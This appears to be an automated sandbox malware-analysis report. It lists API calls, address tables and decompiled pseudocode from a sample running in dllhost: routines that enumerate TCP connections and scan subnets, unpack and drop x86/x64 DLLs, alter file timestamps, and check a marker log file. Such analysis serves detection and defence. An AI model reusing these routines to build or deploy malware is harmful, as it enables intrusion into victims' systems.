                                                0x0286553a
                                                0x0286553f
                                                0x02865542
                                                0x02865544
                                                0x02865546
                                                0x0286554c
                                                0x0286554e
                                                0x02865557
                                                0x02865559
                                                0x02865559
                                                0x02865559
                                                0x02865550
                                                0x02865550
                                                0x02865550
                                                0x0286555c
                                                0x0286555c
                                                0x02865563
                                                0x00000000
                                                0x02865565
                                                0x02865565
                                                0x00000000
                                                0x02865565
                                                0x02865563
                                                0x028654a6
                                                0x00000000
                                                0x028654a6
                                                0x0286547c
                                                0x028653f9
                                                0x028653fd
                                                0x028653fd
                                                0x02865400
                                                0x02865403
                                                0x02865405
                                                0x02865405
                                                0x02865407
                                                0x02865416
                                                0x0286541d
                                                0x02865423
                                                0x0286542b
                                                0x02865430
                                                0x02865433
                                                0x02865435
                                                0x02865437
                                                0x0286543d
                                                0x0286543f
                                                0x02865448
                                                0x0286544a
                                                0x0286544a
                                                0x0286544a
                                                0x02865441
                                                0x02865441
                                                0x02865441
                                                0x0286544d
                                                0x0286544d
                                                0x02865454
                                                0x00000000
                                                0x02865456
                                                0x02865456
                                                0x00000000
                                                0x02865456
                                                0x02865454
                                                0x028653ad
                                                0x00000000
                                                0x028653ad
                                                0x02865362
                                                0x02865377
                                                0x0286537a
                                                0x00000000
                                                0x00000000
                                                0x02865380
                                                0x02865383
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02865383
                                                0x02865367
                                                0x00000000
                                                0x00000000
                                                0x02865370
                                                0x00000000
                                                0x00000000
                                                0x02865741
                                                0x02865747
                                                0x0286574d
                                                0x02865754
                                                0x02865757
                                                0x0286575d
                                                0x02865763
                                                0x0286576b
                                                0x02865771
                                                0x00000000
                                                0x02865771
                                                0x028652b5
                                                0x028652c8
                                                0x028652ca
                                                0x028652d2
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x02865777
                                                0x0286577d
                                                0x02865784
                                                0x0286578e
                                                0x0286579b
                                                0x028657a1
                                                0x028657a3
                                                0x028657a9
                                                0x00000000

                                                APIs
                                                • Sleep.KERNELBASE(00001388,E7FE870C), ref: 02865241
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02865271
                                                • HeapAlloc.KERNEL32(00000000), ref: 02865274
                                                • GetTcpTable.IPHLPAPI(00000000,00000000,00000001), ref: 028652A4
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 028652B2
                                                • HeapFree.KERNEL32(00000000), ref: 028652B5
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 028652BF
                                                • HeapAlloc.KERNEL32(00000000), ref: 028652C2
                                                • GetTcpTable.IPHLPAPI(00000000,00000018,00000001), ref: 028652E2
                                                • GetTickCount.KERNEL32 ref: 028655F1
                                                • GetTickCount.KERNEL32 ref: 028656F1
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0286577A
                                                • HeapFree.KERNEL32(00000000), ref: 0286577D
                                                • Sleep.KERNEL32(00001388), ref: 02865784
                                                • GetProcessHeap.KERNEL32(00000000,00000018), ref: 02865798
                                                • HeapAlloc.KERNEL32(00000000), ref: 0286579B
                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 028657B6
                                                • HeapFree.KERNEL32(00000000), ref: 028657B9
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree$CountSleepTableTick
                                                • String ID: %d.%d.%d.*
                                                • API String ID: 4207308331-3742512694
                                                • Opcode ID: 9816e08180e4e03ed4de11d5e0ad1d85224b8b3dfa1e159b1c07b1c3b3f6efdd
                                                • Instruction ID: 218a7435aae7bda2d3751be654d69390a3f7eced7f197f30be009360298697d1
                                                • Opcode Fuzzy Hash: 9816e08180e4e03ed4de11d5e0ad1d85224b8b3dfa1e159b1c07b1c3b3f6efdd
                                                • Instruction Fuzzy Hash: A1F17C789002699FEB30DF64CC98BB9B7B5AB05304F8445E9D44EE7281DB789A88CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0286FC10 Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 254filetimeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 123 286fc10-286fc2e 124 286fc37-286fc46 123->124 125 286fc30-286fc32 call 286f2d0 123->125 127 286fc5f-286fc62 124->127 128 286fc48-286fc5c call 2870a5d 124->128 125->124 130 286fc64-286fc6b call 286ec60 127->130 131 286fc6e-286fc74 127->131 130->131 134 286fc76-286fc7a 131->134 135 286fcc9-286fce1 call 286f4e0 131->135 138 286fcc2-286fcc7 134->138 139 286fc7c-286fc80 134->139 142 286fce3-286fce5 135->142 143 286fd1b-286fd21 135->143 138->134 138->135 139->138 141 286fc82-286fc89 139->141 141->138 144 286fc8b-286fcbf call 286e7c0 141->144 148 286fce7-286fce9 142->148 149 286fcfd 142->149 146 286fd36-286fd3e 143->146 147 286fd23-286fd25 143->147 144->138 153 286fd40-286fd4b 146->153 151 286fd27-286fd29 147->151 152 286fd2b 147->152 148->149 154 286fceb-286fced 148->154 155 286fcff-286fd18 call 286fb00 call 2870a5d 149->155 151->152 156 286fd2e-286fd34 151->156 152->156 153->153 157 286fd4d-286fd4f 153->157 158 286fcf5-286fcfb 154->158 159 286fcef-286fcf3 154->159 156->146 156->147 161 286fd51-286fd57 157->161 162 286fd59-286fd62 157->162 158->155 159->149 159->158 164 286fd8b-286fdb1 wsprintfA 161->164 165 286ff08-286ff0f call 2870e90 162->165 166 286fd68-286fd78 162->166 168 286fdd2-286fe02 call 286fb00 CreateFileA 164->168 171 286fdb3-286fdd0 wsprintfA 166->171 172 286fd7a-286fd7c 166->172 178 286fe04-286fe19 call 2870a5d 168->178 179 286fe1c-286fe30 call 286ef10 168->179 171->168 172->171 175 286fd7e-286fd80 172->175 175->164 177 286fd82-286fd89 175->177 177->164 177->171 184 286fe45-286fe4f 179->184 185 286fe32-286fe3f call 2870ab4 179->185 187 286fe50-286fe71 call 286f090 184->187 185->184 191 286fed7 187->191 192 286fe73-286fe75 187->192 195 286fee1-286feea FindCloseChangeNotification call 286f2d0 191->195 193 286fe77 192->193 194 286fea1-286feab 192->194 196 286fe94-286fe9b 193->196 197 286fe79-286fe92 WriteFile 193->197 194->195 202 286feef-286ff05 call 2870a5d 195->202 200 286fe9d-286fe9f 196->200 201 286feb9-286fed5 SetFileTime 196->201 197->196 199 286fead-286feb7 197->199 199->195 200->187 200->194 201->195
                                                C-Code - Quality: 84%
                                                			E0286FC10(signed int* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8) {
				signed int _v8;
				char _v267;
				char _v268;
				char _v528;
				struct _FILETIME _v544;
				struct _FILETIME _v552;
				struct _FILETIME _v560;
				long _v564;
				char _v828;
				char _v829;
				struct _OVERLAPPED* _v836;
				long _v840;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				signed int _t80;
				char _t81;
				void* _t83;
				signed int _t91;
				void* _t97;
				long _t100;
				signed int _t110;
				void* _t111;
				signed int _t120;
				signed int _t125;
				signed int _t127;
				signed int* _t133;
				signed int _t134;
				void* _t136;
				intOrPtr _t142;
				signed int* _t144;
				signed int* _t145;
				signed int _t148;
				signed int* _t156;
				signed int* _t167;
				signed int* _t174;
				signed int _t175;
				void* _t181;
				signed int _t183;
				signed int* _t184;
				long _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				signed int _t190;
				signed int _t192;
				signed int _t197;
				void* _t198;
				void* _t200;

				_t166 = __edx;
				_t192 = _t197;
				_t198 = _t197 - 0x344;
				_t74 =  *0x288f008; // 0xe7fe870c
				_v8 = _t74 ^ _t192;
				_t133 = _a8;
				_t174 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
					E0286F2D0( *((intOrPtr*)(__ecx)), __edx);
				}
				_t76 =  *_t174;
				_t142 = _a4;
				_t174[1] = 0xffffffff;
				if(_t142 <  *((intOrPtr*)(_t76 + 4))) {
					__eflags = _t142 -  *((intOrPtr*)(_t76 + 0x10));
					if(_t142 <  *((intOrPtr*)(_t76 + 0x10))) {
						E0286EC60(_t76);
						_t142 = _a4;
					}
					_t77 =  *_t174;
					_push(_t181);
					__eflags =  *((intOrPtr*)(_t77 + 0x10)) - _t142;
					if( *((intOrPtr*)(_t77 + 0x10)) < _t142) {
						do {
							_t190 =  *_t174;
							__eflags = _t190;
							if(_t190 != 0) {
								__eflags =  *(_t190 + 0x18);
								if( *(_t190 + 0x18) != 0) {
									_t166 =  *((intOrPtr*)(_t190 + 0x10)) + 1;
									__eflags = _t166 -  *((intOrPtr*)(_t190 + 4));
									if(_t166 !=  *((intOrPtr*)(_t190 + 4))) {
										 *((intOrPtr*)(_t190 + 0x10)) = _t166;
										 *((intOrPtr*)(_t190 + 0x14)) =  *((intOrPtr*)(_t190 + 0x14)) +  *((intOrPtr*)(_t190 + 0x48)) + 0x2e +  *((intOrPtr*)(_t190 + 0x50)) +  *((intOrPtr*)(_t190 + 0x4c));
										_t20 = _t190 + 0x28; // 0x28
										_t166 = _t20;
										_t21 = _t190 + 0x78; // 0x78
										_t125 = E0286E7C0(_t190, _t20, _t21, 0, 0);
										_t142 = _a4;
										_t198 = _t198 - 0x10 + 0x1c;
										asm("sbb eax, eax");
										_t127 =  ~_t125 + 1;
										__eflags = _t127;
										 *(_t190 + 0x18) = _t127;
									}
								}
							}
							_t120 =  *_t174;
							__eflags =  *((intOrPtr*)(_t120 + 0x10)) - _t142;
						} while ( *((intOrPtr*)(_t120 + 0x10)) < _t142);
					}
					E0286F4E0(_t133, _t174, _t166, _t174, _t142,  &_v828);
					__eflags = _v564 & 0x00000010;
					_t80 =  *_t133;
					if((_v564 & 0x00000010) == 0) {
						_t167 = _t133;
						_t144 = _t133;
						__eflags = _t80;
						while(_t80 != 0) {
							__eflags = _t80 - 0x2f;
							if(_t80 == 0x2f) {
								L23:
								_t32 =  &(_t144[0]); // 0x2865105
								_t167 = _t32;
							} else {
								__eflags = _t80 - 0x5c;
								if(_t80 == 0x5c) {
									goto L23;
								}
							}
							_t33 =  &(_t144[0]); // 0x2896a4c
							_t80 =  *_t33;
							_t144 =  &(_t144[0]);
							__eflags = _t80;
						}
						_t145 = _t133;
						_t183 =  &_v268 - _t133;
						__eflags = _t183;
						do {
							_t81 =  *_t145;
							_t35 =  &(_t145[0]); // 0x2896a4c
							_t145 = _t35;
							 *((char*)(_t183 + _t145 - 1)) = _t81;
							__eflags = _t81;
						} while (_t81 != 0);
						__eflags = _t167 - _t133;
						if(_t167 != _t133) {
							_t83 = _t167 - _t133;
							__eflags = _t83 - 0x104;
							if(_t83 >= 0x104) {
								E02870E90();
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t183);
								_t184 = _t145;
								_push(_t174);
								__eflags = _t184[1] - 0xffffffff;
								if(_t184[1] != 0xffffffff) {
									E0286F2D0( *_t184, _t167);
								}
								_t175 =  *_t184;
								_t184[1] = 0xffffffff;
								__eflags = _t175;
								if(_t175 != 0) {
									__eflags =  *(_t175 + 0x7c);
									if( *(_t175 + 0x7c) != 0) {
										E0286F2D0(_t175, _t167);
									}
									_push(_t133);
									_t134 =  *_t175;
									__eflags = _t134;
									if(_t134 != 0) {
										__eflags =  *((char*)(_t134 + 0x10));
										if( *((char*)(_t134 + 0x10)) != 0) {
											CloseHandle( *(_t134 + 4));
										}
										_push(0x20);
										E02870AA1(_t134);
										_t198 = _t198 + 8;
									}
									L02875A36(_t175);
								}
								__eflags = 0;
								 *_t184 = 0;
								return 0;
							} else {
								 *((char*)(_t192 + _t83 - 0x108)) = 0;
								_t91 = _v268;
								__eflags = _t91 - 0x2f;
								if(_t91 == 0x2f) {
									L35:
									wsprintfA( &_v528, "%s%s",  &_v268, _t167);
									_t200 = _t198 + 0x10;
									_t148 = 0;
									__eflags = 0;
								} else {
									__eflags = _t91 - 0x5c;
									if(_t91 == 0x5c) {
										goto L35;
									} else {
										__eflags = _t91;
										if(_t91 == 0) {
											goto L34;
										} else {
											__eflags = _v267 - 0x3a;
											if(_v267 == 0x3a) {
												goto L35;
											} else {
												goto L34;
											}
										}
									}
								}
								goto L36;
							}
						} else {
							_v268 = _t81;
							L34:
							_t183 =  &(_t174[0x50]);
							wsprintfA( &_v528, "%s%s%s", _t183,  &_v268, _t167);
							_t200 = _t198 + 0x14;
							_t148 = _t183;
							L36:
							E0286FB00(_t148,  &_v268); // executed
							_t97 = CreateFileA( &_v528, 0x40000000, 0, 0, 2, _v564, 0); // executed
							_t136 = _t97;
							__eflags = _t136 - 0xffffffff;
							if(_t136 != 0xffffffff) {
								E0286EF10( *_t174, _t174[0x4e]); // executed
								__eflags = _t174[0x4f];
								if(__eflags == 0) {
									_push(0x4000);
									_t111 = E02870AB4(_t183, __eflags);
									_t200 = _t200 + 4;
									_t174[0x4f] = _t111;
								}
								_v836 = 0;
								while(1) {
									_t170 = _t174[0x4f];
									_t100 = E0286F090( *_t174, _t174[0x4f], 0x4000,  &_v829); // executed
									_t186 = _t100;
									_t200 = _t200 + 8;
									__eflags = _t186 - 0xffffff96;
									if(_t186 == 0xffffff96) {
										break;
									}
									__eflags = _t186;
									if(__eflags < 0) {
										L47:
										_v836 = 0x5000000;
									} else {
										if(__eflags <= 0) {
											L45:
											__eflags = _v829;
											if(_v829 != 0) {
												SetFileTime(_t136,  &_v552,  &_v560,  &_v544); // executed
											} else {
												__eflags = _t186;
												if(_t186 != 0) {
													continue;
												} else {
													goto L47;
												}
											}
										} else {
											_t110 = WriteFile(_t136, _t174[0x4f], _t186,  &_v840, 0); // executed
											__eflags = _t110;
											if(_t110 == 0) {
												_v836 = 0x400;
											} else {
												goto L45;
											}
										}
									}
									L51:
									FindCloseChangeNotification(_t136); // executed
									E0286F2D0( *_t174, _t170);
									__eflags = _v8 ^ _t192;
									_pop(_t187);
									return E02870A5D(_v8 ^ _t192, _t187);
									goto L64;
								}
								_v836 = 0x1000;
								goto L51;
							} else {
								_pop(_t188);
								__eflags = _v8 ^ _t192;
								return E02870A5D(_v8 ^ _t192, _t188);
							}
						}
					} else {
						__eflags = _t80 - 0x2f;
						if(_t80 == 0x2f) {
							L18:
							_t156 = 0;
							__eflags = 0;
						} else {
							__eflags = _t80 - 0x5c;
							if(_t80 == 0x5c) {
								goto L18;
							} else {
								__eflags = _t80;
								if(_t80 == 0) {
									L17:
									_t156 =  &(_t174[0x50]);
								} else {
									__eflags = _t133[0] - 0x3a;
									if(_t133[0] == 0x3a) {
										goto L18;
									} else {
										goto L17;
									}
								}
							}
						}
						E0286FB00(_t156, _t133);
						_pop(_t189);
						__eflags = _v8 ^ _t192;
						return E02870A5D(_v8 ^ _t192, _t189);
					}
				} else {
					return E02870A5D(_v8 ^ _t192, _t181);
				}
				L64:
			}























































                                                0x0286fc10
                                                0x0286fc11
                                                0x0286fc13
                                                0x0286fc19
                                                0x0286fc20
                                                0x0286fc24
                                                0x0286fc28
                                                0x0286fc2e
                                                0x0286fc32
                                                0x0286fc32
                                                0x0286fc37
                                                0x0286fc39
                                                0x0286fc3c
                                                0x0286fc46
                                                0x0286fc5f
                                                0x0286fc62
                                                0x0286fc66
                                                0x0286fc6b
                                                0x0286fc6b
                                                0x0286fc6e
                                                0x0286fc70
                                                0x0286fc71
                                                0x0286fc74
                                                0x0286fc76
                                                0x0286fc76
                                                0x0286fc78
                                                0x0286fc7a
                                                0x0286fc7c
                                                0x0286fc80
                                                0x0286fc85
                                                0x0286fc86
                                                0x0286fc89
                                                0x0286fc9c
                                                0x0286fc9f
                                                0x0286fca2
                                                0x0286fca2
                                                0x0286fca7
                                                0x0286fcaf
                                                0x0286fcb4
                                                0x0286fcb7
                                                0x0286fcbc
                                                0x0286fcbe
                                                0x0286fcbe
                                                0x0286fcbf
                                                0x0286fcbf
                                                0x0286fc89
                                                0x0286fc80
                                                0x0286fcc2
                                                0x0286fcc4
                                                0x0286fcc4
                                                0x0286fc76
                                                0x0286fcd3
                                                0x0286fcd8
                                                0x0286fcdf
                                                0x0286fce1
                                                0x0286fd1b
                                                0x0286fd1d
                                                0x0286fd1f
                                                0x0286fd21
                                                0x0286fd23
                                                0x0286fd25
                                                0x0286fd2b
                                                0x0286fd2b
                                                0x0286fd2b
                                                0x0286fd27
                                                0x0286fd27
                                                0x0286fd29
                                                0x00000000
                                                0x00000000
                                                0x0286fd29
                                                0x0286fd2e
                                                0x0286fd2e
                                                0x0286fd31
                                                0x0286fd32
                                                0x0286fd32
                                                0x0286fd3c
                                                0x0286fd3e
                                                0x0286fd3e
                                                0x0286fd40
                                                0x0286fd40
                                                0x0286fd42
                                                0x0286fd42
                                                0x0286fd45
                                                0x0286fd49
                                                0x0286fd49
                                                0x0286fd4d
                                                0x0286fd4f
                                                0x0286fd5b
                                                0x0286fd5d
                                                0x0286fd62
                                                0x0286ff08
                                                0x0286ff0d
                                                0x0286ff0e
                                                0x0286ff0f
                                                0x0286ff10
                                                0x0286ff11
                                                0x0286ff13
                                                0x0286ff14
                                                0x0286ff18
                                                0x0286ff1c
                                                0x0286ff1c
                                                0x0286ff21
                                                0x0286ff23
                                                0x0286ff2a
                                                0x0286ff2c
                                                0x0286ff2e
                                                0x0286ff32
                                                0x0286ff36
                                                0x0286ff36
                                                0x0286ff3b
                                                0x0286ff3c
                                                0x0286ff3e
                                                0x0286ff40
                                                0x0286ff42
                                                0x0286ff46
                                                0x0286ff4b
                                                0x0286ff4b
                                                0x0286ff51
                                                0x0286ff54
                                                0x0286ff59
                                                0x0286ff59
                                                0x0286ff5d
                                                0x0286ff65
                                                0x0286ff66
                                                0x0286ff69
                                                0x0286ff6c
                                                0x0286fd68
                                                0x0286fd68
                                                0x0286fd70
                                                0x0286fd76
                                                0x0286fd78
                                                0x0286fdb3
                                                0x0286fdc7
                                                0x0286fdcd
                                                0x0286fdd0
                                                0x0286fdd0
                                                0x0286fd7a
                                                0x0286fd7a
                                                0x0286fd7c
                                                0x00000000
                                                0x0286fd7e
                                                0x0286fd7e
                                                0x0286fd80
                                                0x00000000
                                                0x0286fd82
                                                0x0286fd82
                                                0x0286fd89
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fd89
                                                0x0286fd80
                                                0x0286fd7c
                                                0x00000000
                                                0x0286fd78
                                                0x0286fd51
                                                0x0286fd51
                                                0x0286fd8b
                                                0x0286fd93
                                                0x0286fda6
                                                0x0286fdac
                                                0x0286fdaf
                                                0x0286fdd2
                                                0x0286fdd8
                                                0x0286fdf7
                                                0x0286fdfd
                                                0x0286fdff
                                                0x0286fe02
                                                0x0286fe24
                                                0x0286fe29
                                                0x0286fe30
                                                0x0286fe32
                                                0x0286fe37
                                                0x0286fe3c
                                                0x0286fe3f
                                                0x0286fe3f
                                                0x0286fe45
                                                0x0286fe50
                                                0x0286fe50
                                                0x0286fe64
                                                0x0286fe69
                                                0x0286fe6b
                                                0x0286fe6e
                                                0x0286fe71
                                                0x00000000
                                                0x00000000
                                                0x0286fe73
                                                0x0286fe75
                                                0x0286fea1
                                                0x0286fea1
                                                0x0286fe77
                                                0x0286fe77
                                                0x0286fe94
                                                0x0286fe94
                                                0x0286fe9b
                                                0x0286fecf
                                                0x0286fe9d
                                                0x0286fe9d
                                                0x0286fe9f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fe9f
                                                0x0286fe79
                                                0x0286fe8a
                                                0x0286fe90
                                                0x0286fe92
                                                0x0286fead
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fe92
                                                0x0286fe77
                                                0x0286fee1
                                                0x0286fee2
                                                0x0286feea
                                                0x0286fef8
                                                0x0286fefa
                                                0x0286ff05
                                                0x00000000
                                                0x0286ff05
                                                0x0286fed7
                                                0x00000000
                                                0x0286fe04
                                                0x0286fe04
                                                0x0286fe0f
                                                0x0286fe19
                                                0x0286fe19
                                                0x0286fe02
                                                0x0286fce3
                                                0x0286fce3
                                                0x0286fce5
                                                0x0286fcfd
                                                0x0286fcfd
                                                0x0286fcfd
                                                0x0286fce7
                                                0x0286fce7
                                                0x0286fce9
                                                0x00000000
                                                0x0286fceb
                                                0x0286fceb
                                                0x0286fced
                                                0x0286fcf5
                                                0x0286fcf5
                                                0x0286fcef
                                                0x0286fcef
                                                0x0286fcf3
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0286fcf3
                                                0x0286fced
                                                0x0286fce9
                                                0x0286fd01
                                                0x0286fd06
                                                0x0286fd0e
                                                0x0286fd18
                                                0x0286fd18
                                                0x0286fc48
                                                0x0286fc5c
                                                0x0286fc5c
                                                0x00000000

                                                APIs
                                                • wsprintfA.USER32 ref: 0286FDA6
                                                • wsprintfA.USER32 ref: 0286FDC7
                                                • CreateFileA.KERNELBASE(?,40000000,00000000,00000000,00000002,00000010,00000000), ref: 0286FDF7
                                                • WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0286FE8A
                                                • SetFileTime.KERNELBASE(00000000,?,?,?), ref: 0286FECF
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0286FEE2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$wsprintf$ChangeCloseCreateFindNotificationTimeWrite
                                                • String ID: %s%s$%s%s%s$:
                                                • API String ID: 2340708895-3034790606
                                                • Opcode ID: a8129ffd51fa7e1da65f0d7ad5126aa118ae8e2a51bb02b7b90eb835b151ac22
                                                • Instruction ID: 2c01bc5cba53e594e4e21fca43b2b561086c28ca8a3932a5321780c18952c7ff
                                                • Opcode Fuzzy Hash: a8129ffd51fa7e1da65f0d7ad5126aa118ae8e2a51bb02b7b90eb835b151ac22
                                                • Instruction Fuzzy Hash: 77912D7D6002189BDB24CF68E888BF9B766AF14304F100599DA5FDBA81C770F995CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02866FE0 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 102fileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                C-Code - Quality: 91%
                                                			E02866FE0(void* __ebx, CHAR* __ecx, void* __edi) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v788;
				void* __esi;
				signed int _t17;
				void* _t23;
				void* _t29;
				void* _t30;
				void* _t42;
				CHAR* _t59;
				signed int _t60;

				_t58 = __edi;
				_t17 =  *0x288f008; // 0xe7fe870c
				_v8 = _t17 ^ _t60;
				_t59 = __ecx;
				E02873440(__edi,  &_v268, 0, 0x104);
				_push("Diagnostics.txt");
				E02865180( &_v268, 0x104, "%s\%s", _t59);
				_t23 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0, 0); // executed
				_t66 = _t23 - 0xffffffff;
				if(_t23 == 0xffffffff) {
					L5:
					__eflags = _v8 ^ _t60;
					return E02870A5D(_v8 ^ _t60, _t59);
				} else {
					FindCloseChangeNotification(_t23); // executed
					CreateDirectoryA(_t59, 0); // executed
					_t29 = E02867140(_t66,  &_v268); // executed
					_t67 = _t29;
					if(_t29 == 0) {
						goto L5;
					} else {
						_t30 = E02865010(__ebx, _t59, _t58, _t67); // executed
						_t68 = _t30;
						if(_t30 == 0) {
							goto L5;
						} else {
							DeleteFileA( &_v268);
							E02873440(_t58,  &_v528, 0, 0x104);
							E02873440(_t58,  &_v788, 0, 0x104);
							E02865180( &_v528, 0x104, "%s\\x86.dll", _t59);
							E02865180( &_v788, 0x104, "%s\\x64.dll", _t59);
							_t42 = E02867140(_t68,  &_v528);
							_t69 = _t42;
							if(_t42 == 0) {
								goto L5;
							} else {
								E02867140(_t69,  &_v788);
								return E02870A5D(_v8 ^ _t60, _t59);
							}
						}
					}
				}
			}















                                                0x02866fe0
                                                0x02866fe9
                                                0x02866ff0
                                                0x02866fff
                                                0x02867004
                                                0x02867009
                                                0x02867020
                                                0x0286703c
                                                0x02867042
                                                0x02867045
                                                0x0286712d
                                                0x02867132
                                                0x0286713d
                                                0x0286704b
                                                0x0286704c
                                                0x02867055
                                                0x02867067
                                                0x0286706f
                                                0x02867071
                                                0x00000000
                                                0x02867077
                                                0x0286707f
                                                0x02867084
                                                0x02867086
                                                0x00000000
                                                0x0286708c
                                                0x02867093
                                                0x028670a7
                                                0x028670ba
                                                0x028670d1
                                                0x028670e8
                                                0x028670f9
                                                0x02867101
                                                0x02867103
                                                0x00000000
                                                0x02867105
                                                0x02867111
                                                0x0286712c
                                                0x0286712c
                                                0x02867103
                                                0x02867086
                                                0x02867071

                                                APIs
                                                • CreateFileA.KERNELBASE(C:\Windows\system32\msvcwme.log,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0286703C
                                                • FindCloseChangeNotification.KERNELBASE(00000000), ref: 0286704C
                                                • CreateDirectoryA.KERNELBASE(?,00000000), ref: 02867055
                                                • DeleteFileA.KERNEL32(?), ref: 02867093
                                                  • Part of subcall function 02867140: CreateFileA.KERNELBASE(00000000,40000000,00000002,00000000,00000002,00000080,00000000,?,?), ref: 0286718D
                                                  • Part of subcall function 02867140: WriteFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,?,?), ref: 028671A5
                                                  • Part of subcall function 02867140: CloseHandle.KERNEL32(00000000,?,?), ref: 028671B0
                                                  • Part of subcall function 02867140: FindCloseChangeNotification.KERNELBASE(00000000,?,?), ref: 028671BE
                                                  • Part of subcall function 02867140: LocalFree.KERNELBASE(00000000,?,?), ref: 028671C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000017.00000002.749016186.0000000002860000.00000040.00000400.00020000.00000000.sdmp, Offset: 02860000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_23_2_2860000_dllhost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreate$ChangeFindNotification$DeleteDirectoryFreeHandleLocalWrite
                                                • String ID: %s\%s$%s\x64.dll$%s\x86.dll$C:\Windows\system32\msvcwme.log$Diagnostics.txt
                                                • API String ID: 3326945587-1068396467
                                                • Opcode ID: 5a8332a1b565682b89c32a7f5d6a97ffbcea8f4c7e5f8dcc73dfb6f9096adab2
                                                • Instruction ID: 4519d085ed59699e4158f084b0aa5e4445f3828ec6583d3c657e0b50e0b39b73
                                                • Opcode Fuzzy Hash: 5a8332a1b565682b89c32a7f5d6a97ffbcea8f4c7e5f8dcc73dfb6f9096adab2
                                                • Instruction Fuzzy Hash: 8031EDBCA40318B7EA20E764DC4AFE9735DDF05704F5004D2B694EB1C0D6B4A7948A92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 028649E0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 86filememoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 235 28649e0-2864a0e CreateFileA 236 2864a10-2864a3f GetFileSizeEx LocalAlloc 235->236 237 2864a48-2864a50 235->237 238 2864a51-2864a5e 236->238 239 2864a41-2864a42 CloseHandle 236->239 240 2864a60-2864a7c ReadFile 238->240 241 2864a8c-2864a8f 238->241 239->237 242 2864a7e-2864a87 240->242 243 2864a89 240->243 244 2864a91-2864aaa CloseHandle LocalFree 241->244 245 2864aab-2864ab9 FindCloseChangeNotification 241->245 242->240 242->243 243->241
                                                C-Code - Quality: 67%
                                                			E028649E0(void** __edx, struct _OVERLAPPED** _a4) {
				void** _v12;
				long _v16;
				long _v20;
				struct _OVERLAPPED* _v28;
				long _v32;
				void* _t15;
				void* _t18;
				long _t19;
				long _t27;
				void* _t29;
				void** _t30;
				struct _OVERLAPPED** _t33;
				long _t34;

				_v12 = __edx;
				_t15 = CreateFileA("C:\\Windows\\system32\\msvcwme.log", 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_t29 = _t15;
				if(_t29 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_v32 = 0;
					_v28 = 0;
					__imp__GetFileSizeEx(_t29,  &_v32);
					_t34 = _v32;
					_v20 = _t34;
					_t18 = LocalAlloc(0x40, _t34);
					_t30 = _v12;
					 *_t30 = _t18;
					if(_t18 != 0) {
						_t33 = _a4;
						_t19 = _t34;
						 *_t33 = 0;
						if(_t19 > 0) {
							while(1) {
								_v16 = 0;
								ReadFile(_t29,  *_t30, _t34,  &_v16, 0); // executed
								_t27 = _v16;
								if(_t27 == 0) {
									break;
								}
								 *_t33 =  *_t33 + _t27;
								_t34 = _t34 - _t27;
								_t30 = _v12;
								if(_t34 > 0) {
									continue;
								}
								break;
							}
							_t19 = _v20;
						}
						_push(_t29);
						if( *_t33 == _t19) {
							FindCloseChangeNotification(); // executed
							return 1;
						} else {
							CloseHandle();
							LocalFree( *_v12);
							return 0; // executed
						}
					} else {
						CloseHandle(_t29);
						goto L3;
					}
				}
			}
















                                                0x02864a00
                                                0x02864a03
                                                0x02864a09
                                                0x02864a0e
                                                0x02864a48
                                                0x02864a50
                                                0x02864a10
                                                0x02864a13
                                                0x02864a1c
                                                0x02864a23
                                                0x02864a29
                                                0x02864a2f
                                                0x02864a32
                                                0x02864a38
                                                0x02864a3b
                                                0x02864a3f
                                                0x02864a51
                                                0x02864a54
                                                0x02864a56
                                                0x02864a5e
                                                0x02864a60
                                                0x02864a65
                                                0x02864a71
                                                0x02864a77
                                                0x02864a7c
                                                0x00000000
                                                0x00000000
